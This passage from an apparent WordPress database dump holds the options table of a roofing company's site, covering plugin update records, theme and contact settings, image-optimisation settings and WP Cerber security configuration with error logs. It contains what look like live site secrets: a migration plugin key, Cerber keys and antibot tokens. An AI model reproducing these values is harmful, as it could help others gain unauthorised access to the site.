"1.3\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/skt-blocks/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/plugin/skt-blocks.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/skt-blocks/assets/icon-128x128.png?rev=2522442\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/skt-blocks/assets/banner-1544x500.jpg?rev=2522442\";s:2:\"1x\";s:65:\"https://ps.w.org/skt-blocks/assets/banner-772x250.jpg?rev=2522442\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:23:\"wp-smushit/wp-smush.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/wp-smushit\";s:4:\"slug\";s:10:\"wp-smushit\";s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:11:\"new_version\";s:6:\"3.11.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-smushit/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/wp-smushit.3.11.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-256x256.png?rev=2746115\";s:2:\"1x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-128x128.png?rev=2746115\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-smushit/assets/banner-1544x500.png?rev=2624292\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-smushit/assets/banner-772x250.png?rev=2624292\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";}s:39:\"theme-demo-import/theme-demo-import.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/theme-demo-import\";s:4:\"slug\";s:17:\"theme-demo-import\";s:6:\"plugin\";s:39:\"theme-demo-import/theme-demo-import.php\";s:11:\"new_version\";s:5:\"1.1.0\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/theme-demo-import/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/theme-demo-import.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/theme-demo-import/assets/icon-256x256.png?rev=1523494\";s:2:\"1x\";s:70:\"https://ps.w.org/theme-demo-import/assets/icon-128x128.png?rev=1523494\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/theme-demo-import/assets/banner-1544x500.png?rev=1523494\";s:2:\"1x\";s:72:\"https://ps.w.org/theme-demo-import/assets/banner-772x250.png?rev=1523494\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";}s:19:\"weforms/weforms.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/weforms\";s:4:\"slug\";s:7:\"weforms\";s:6:\"plugin\";s:19:\"weforms/weforms.php\";s:11:\"new_version\";s:6:\"1.6.14\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/weforms/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/weforms.1.6.14.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/weforms/assets/icon-256x256.png?rev=1978687\";s:2:\"1x\";s:60:\"https://ps.w.org/weforms/assets/icon-128x128.png?rev=1978687\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/weforms/assets/banner-1544x500.png?rev=2243402\";s:2:\"1x\";s:62:\"https://ps.w.org/weforms/assets/banner-772x250.png?rev=2243402\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}}s:7:\"checked\";a:12:{s:19:\"akismet/akismet.php\";s:5:\"5.0.1\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.63\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"5.6.4\";s:33:\"defender-security/wp-defender.php\";s:5:\"3.2.0\";s:9:\"hello.php\";s:5:\"1.7.2\";s:19:\"jetpack/jetpack.php\";s:4:\"11.4\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:5:\"5.3.3\";s:25:\"skt-blocks/skt-blocks.php\";s:3:\"1.3\";s:23:\"wp-smushit/wp-smush.php\";s:6:\"3.11.1\";s:39:\"theme-demo-import/theme-demo-import.php\";s:5:\"1.1.0\";s:19:\"weforms/weforms.php\";s:6:\"1.6.14\";s:23:\"wp-cerber/wp-cerber.php\";s:3:\"9.1\";}}','no'),(10614,'_transient_timeout_jetpack_file_data_11.3.2','1666396424','no'),(10615,'_transient_jetpack_file_data_11.3.2','a:1:{s:32:\"3fd340ad52927afb3bbb9e98575eccfd\";a:15:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:24:\"requires_user_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}}','no'),(14965,'_transient_timeout_jetpack_file_data_11.4','1667433238','no'),(14966,'_transient_jetpack_file_data_11.4','a:1:{s:32:\"3fd340ad52927afb3bbb9e98575eccfd\";a:15:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:24:\"requires_user_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}}','no'),(166,'can_compress_scripts','1','no'),(182,'recently_activated','a:0:{}','yes'),(173,'current_theme','SKT GB Renovation','yes'),(174,'theme_mods_skt-gb-renovation','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:6;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(175,'theme_switched','','yes'),(187,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.6.4\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1661127648;s:7:\"version\";s:5:\"5.6.2\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(188,'auto_update_plugins','a:7:{i:0;s:19:\"akismet/akismet.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:9:\"hello.php\";i:3;s:19:\"jetpack/jetpack.php\";i:4;s:25:\"skt-blocks/skt-blocks.php\";i:5;s:39:\"theme-demo-import/theme-demo-import.php\";i:6;s:19:\"weforms/weforms.php\";}','no'),(195,'widget_recent-comments','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(196,'widget_recent-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(2195,'wp-smush-preset_configs','a:1:{i:0;a:5:{s:2:\"id\";i:1;s:4:\"name\";s:14:\"Default config\";s:11:\"description\";s:46:\"Recommended performance config for every site.\";s:7:\"default\";b:1;s:6:\"config\";a:2:{s:7:\"configs\";a:1:{s:8:\"settings\";a:22:{s:4:\"auto\";b:1;s:5:\"lossy\";b:1;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:1;s:6:\"backup\";b:1;s:10:\"png_to_jpg\";b:1;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:0;s:17:\"background_images\";b:1;s:16:\"rest_api_support\";b:0;s:8:\"webp_mod\";b:0;}}s:7:\"strings\";a:6:{s:10:\"bulk_smush\";a:1:{i:0;s:190:\"Automatic compression - Active\nSuper-Smush - Active\nMetadata - Active\nImage Resizing - Inactive\nOriginal Images - Inactive\nBackup Original Images - Inactive\nPNG to JPEG Conversion - Inactive\";}s:9:\"lazy_load\";a:1:{i:0;s:8:\"Inactive\";}s:3:\"cdn\";a:1:{i:0;s:8:\"Inactive\";}s:8:\"webp_mod\";a:1:{i:0;s:8:\"Inactive\";}s:12:\"integrations\";a:1:{i:0;s:109:\"Gutenberg Support - Inactive\nWPBakery Page Builder - Inactive\nAmazon S3 - Inactive\nNextGen Gallery - Inactive\";}s:8:\"settings\";a:1:{i:0;s:122:\"Image Resize Detection - Inactive\nColor Accessibility - Inactive\nUsage Tracking - Inactive\nKeep Data On Uninstall - Active\";}}}}}','no'),(2194,'smush_global_stats','a:9:{s:11:\"size_before\";i:5675864;s:10:\"size_after\";i:5007605;s:7:\"percent\";d:11.8;s:5:\"human\";s:8:\"652.6 KB\";s:5:\"bytes\";i:668259;s:12:\"total_images\";i:249;s:12:\"resize_count\";i:0;s:14:\"resize_savings\";i:0;s:18:\"conversion_savings\";i:0;}','no'),(199,'wp_calendar_block_has_published_posts','','yes'),(200,'category_children','a:0:{}','yes'),(337,'complete','a:24:{s:9:\"converted\";i:1;s:13:\"phntp_text_id\";s:68:\"<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Call : (248) 393-5000\";s:10:\"emltp_text\";s:73:\"<i class=\"fa fa-envelope\" aria-hidden=\"true\"></i> mbarber@dunriteroof.com\";s:10:\"suptp_text\";s:105:\"Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years\";s:10:\"sintp_text\";s:37:\"[social_area][social icon=\"facebook\" \";s:13:\"logo_image_id\";a:1:{s:3:\"url\";s:61:\"https://cteisys.com/wp-content/uploads/2022/08/logo-small.jpg\";}s:17:\"logo_image_height\";s:5:\"150px\";s:16:\"logo_image_width\";s:5:\"207px\";s:15:\"contact_address\";s:247:\"Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.\";s:13:\"contact_phone\";s:15:\" (248) 393-5000\";s:13:\"contact_email\";s:21:\"admin@dunriteroof.com\";s:19:\"contact_company_url\";s:24:\"https://dunriteroof.com/\";s:18:\"contact_google_map\";s:0:\"\";s:11:\"footer_logo\";s:0:\"\";s:22:\"footer_infobox_content\";s:53:\"<p>[social_area][social icon=\"facebook\" link=\"#\"]</p>\";s:17:\"hide_foot_infobox\";i:1;s:16:\"foot_cols4_title\";s:0:\"\";s:16:\"foot_cols3_title\";s:8:\"Projects\";s:18:\"foot_cols4_content\";s:7:\"<p></p>\";s:18:\"foot_cols3_content\";s:79:\"<p> </p><p>[gallery columns=\"2\" link=\"none\" ids=\"414,413,412,411,410,407\"]</p>\";s:18:\"foot_cols1_content\";s:459:\"<div><h5 class=\"DUwDvf fontHeadlineLarge\"><span style=\"font-size: 16px\">2563 Orbit Dr. Lake Orion, MI 48360 CALL US TODAY (248) 393-5000 or fill out our </span><a style=\"font-size: 16px\" href=\"https://cteisys.com/contact-layout-1/\">Contact Page</a><span style=\"font-size: 16px\">.</span></h5></div><p> </p><p><img class=\"alignnone size-full wp-image-362\" src=\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\" alt=\"\" width=\"171\" height=\"131\" /></p>\";s:21:\"style3_hover_bg_color\";s:7:\"#ffffff\";s:14:\"footer_text_id\";s:110:\"<div class=\"copyright-left\">© Copyright 2021 Renovation</div><div class=\"copyright-right\">Hosted by CTE</div>\";s:23:\"recentpost_block_button\";s:10:\"Contact Us\";}','yes'),(468,'_site_transient_ai1wm_last_check_for_updates','1666266849','no'),(469,'ai1wm_updater','a:0:{}','yes'),(465,'ai1wm_secret_key','9lq8dIMAE09T','yes'),(470,'_cerber_db_errors','a:10:{i:0;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1661214478.642794;}i:1;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"_cerberkey_\" AND the_id = 0\";i:2;d:1661214478.642838;}i:2;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"_cerberkey_\" AND the_id = 0\";i:2;d:1661214478.642936;}i:3;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:219:\"INSERT INTO wp0y_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"_cerberkey_\",0,\"a:3:{i:0;s:32:\\\"b283a6abecea1e50ebc41fbf98331c8b\\\";i:1;i:1661214478;i:4;s:40:\\\"SK//RWS3MQ8EN1PDOI7AFL6KT29CB0YZGH5UXVJ4\\\";}\",0)\";i:2;d:1661214478.642994;}i:4;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:76:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1661214478.656663;}i:5;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:103:\"INSERT INTO wp0y_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1661214478.656718;}i:6;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:77:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1661214478.65676;}i:7;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:104:\"INSERT INTO wp0y_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1661214478.656799;}i:8;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:81:\"SELECT * FROM wp0y_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1661214478.656836;}i:9;a:3:{i:0;s:64:\"ERROR 1146: Table \'cteisys_wp485.wp0y_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp0y_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1661214478.656873;}}','no'),(471,'cerber-antibot','a:2:{i:0;a:3:{i:0;a:2:{i:0;s:6:\"cIt_VS\";i:1;s:9:\"_zuHt[3V6\";}i:1;a:2:{i:0;s:8:\"USOFupVf\";i:1;s:12:\"M[tWLF9dYNgn\";}i:2;a:2:{i:0;s:14:\"BKGVvCSoAEzTcq\";i:1;s:13:\"bSRsIPYw0NnKz\";}}i:1;a:2:{i:0;a:2:{i:0;s:13:\"tKyXvYEjMdoOT\";i:1;s:8:\"v2RYQu4x\";}i:1;a:2:{i:0;s:8:\"eIPGWxXi\";i:1;s:6:\"MpFU@E\";}}}','no'),(488,'cerber-groove','MFrfDXW7evdYmNtP','no'),(489,'cerber-groove-x','a:2:{i:0;s:27:\"ZSEf9h5cwojeHWP0mxaRJqk2sbX\";i:1;s:25:\"ISGVNfZo4gr2KD5nyOML7v8uJ\";}','no'),(472,'cerber-main','a:39:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:11:\"nologinlang\";i:0;s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";s:0:\"\";s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(473,'cerber-hardening','a:15:{s:8:\"stopenum\";s:0:\"\";s:15:\"stopenum_oembed\";s:0:\"\";s:16:\"stopenum_sitemap\";i:0;s:19:\"nouserpages_bylogin\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";s:0:\"\";s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";s:0:\"\";s:6:\"norest\";i:0;s:8:\"restauth\";s:0:\"\";s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";s:0:\"\";}','no'),(474,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";s:0:\"\";s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(475,'cerber-antispam','a:11:{s:8:\"botscomm\";s:0:\"\";s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";s:0:\"\";s:11:\"botsipwhite\";s:1:\"1\";s:10:\"customcomm\";i:0;s:9:\"botswhite\";a:0:{}s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(476,'cerber-recaptcha','a:15:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";s:0:\"\";s:12:\"recapipwhite\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(477,'cerber-notifications','a:26:{s:6:\"notify\";s:0:\"\";s:5:\"above\";i:5;s:5:\"email\";a:0:{}s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:10:\"email_mask\";i:0;s:12:\"email_format\";i:0;s:8:\"use_smtp\";i:0;s:9:\"smtp_host\";s:0:\"\";s:9:\"smtp_port\";s:3:\"587\";s:9:\"smtp_encr\";s:3:\"tls\";s:8:\"smtp_pwd\";s:0:\"\";s:9:\"smtp_user\";s:0:\"\";s:9:\"smtp_from\";s:0:\"\";s:14:\"smtp_from_name\";s:9:\"WP Cerber\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:6:\"pbrate\";s:0:\"\";s:8:\"pbnotify\";i:10;s:16:\"pbnotify-enabled\";s:0:\"\";s:7:\"pb_mask\";i:0;s:9:\"pb_format\";i:0;s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";a:0:{}s:13:\"enable-report\";s:1:\"1\";}','no'),(478,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";a:0:{}s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";s:0:\"\";s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";a:0:{}s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(479,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(480,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(481,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:3:{i:0;s:3:\"tmp\";i:1;s:4:\"temp\";i:2;s:3:\"bak\";}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(482,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";a:0:{}}','no'),(483,'cerber-policies','a:12:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:10:\"scan_media\";i:0;s:15:\"scan_skip_media\";a:14:{i:0;s:3:\"css\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"jpe\";i:4;s:3:\"gif\";i:5;s:3:\"png\";i:6;s:3:\"bmp\";i:7;s:3:\"tif\";i:8;s:4:\"tiff\";i:9;s:3:\"ico\";i:10;s:4:\"woff\";i:11;s:5:\"woff2\";i:12;s:3:\"eot\";i:13;s:3:\"ttf\";}s:14:\"scan_del_media\";a:5:{i:0;s:3:\"php\";i:1;s:2:\"js\";i:2;s:3:\"htm\";i:3;s:4:\"html\";i:4;s:5:\"shtml\";}s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(484,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";s:0:\"\";s:13:\"master_swshow\";s:0:\"\";s:14:\"master_at_site\";s:0:\"\";s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(485,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(486,'_cerber_up','a:2:{s:1:\"v\";s:3:\"9.1\";s:1:\"t\";i:1661214478;}','no'),(487,'cerber_admin_info','<h1>Highlights from WP Cerber Security 9.1</h1><ul><li>New: A new feature that prevents exposing user’s first name, last name, and ID via an HTTP request with a username (login) in an author_name parameter.</li><li>New: A new user status report while viewing the user activity/requests log.</li><li>Improved: When renders admin pages, WP Cerber uses the language selected on the user profile.</li><li>Improved: Improved the speed of rendering of the &quot;Users&quot; admin page. Reduced the number of HTTP requests if some columns on the page are hidden.</li><li>Improved: Implemented support for rate limiting when the scanner retrieves checksum data from remote servers.</li><li>Fixed: A bug that allows an attacker to bypass the &quot;Stop user enumeration&quot; feature if it’s enabled.</li><li>Fixed: A bug that produces incorrect messages in the server error log when the WordPress database connection is lost.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=9.1\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/review/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(14018,'_site_transient_timeout_cerber_hourly_2','1666311127','no'),(14019,'_site_transient_cerber_hourly_2','a:2:{i:0;i:1666303927;i:1;i:1666303927;}','no'),(3201,'_cerber_report','a:2:{i:0;i:1665998032;i:1;a:1:{s:5:\"email\";s:17:\"admin@cteisys.com\";}}','no'),(494,'_site_transient_timeout_cerber_daily_1','1666405236','no'),(495,'_site_transient_cerber_daily_1','a:2:{i:0;i:1666232436;i:1;i:1666232436;}','no'),(14016,'_site_transient_timeout_cerber_hourly_1','1666314298','no'),(14017,'_site_transient_cerber_hourly_1','a:2:{i:0;i:1666307098;i:1;i:1666307098;}','no'),(500,'jetpack_active_modules','a:0:{}','yes'),(507,'action_scheduler_hybrid_store_demarkation','425','yes'),(499,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(506,'defender_free_install_date','1661214824','no'),(508,'schema-ActionScheduler_StoreSchema','5.0.1661214826','yes'),(509,'schema-ActionScheduler_LoggerSchema','3.0.1661214826','yes'),(510,'wd_db_version','3.2.0','no'),(514,'wpmudev_recommended_plugins_registered','a:2:{s:33:\"defender-security/wp-defender.php\";a:1:{s:13:\"registered_at\";i:1661214828;}s:23:\"wp-smushit/wp-smush.php\";a:1:{s:13:\"registered_at\";i:1661214975;}}','no'),(515,'action_scheduler_lock_async-request-runner','1666290343','yes'),(525,'wdev-frash','a:3:{s:7:\"plugins\";a:2:{s:23:\"wp-smushit/wp-smush.php\";i:1661214975;s:33:\"defender-security/wp-defender.php\";i:1661214975;}s:5:\"queue\";a:2:{s:32:\"7de3619981caadc55f30a002bfb299f6\";a:4:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1661214975;s:6:\"sticky\";b:1;}s:32:\"fc50097023d0d34c5a66f6cddcf77694\";a:3:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1666376335;}}s:4:\"done\";a:0:{}}','no'),(519,'wp-smush-settings','a:24:{s:4:\"auto\";b:1;s:5:\"lossy\";b:1;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:8:\"no_scale\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:5:\"gform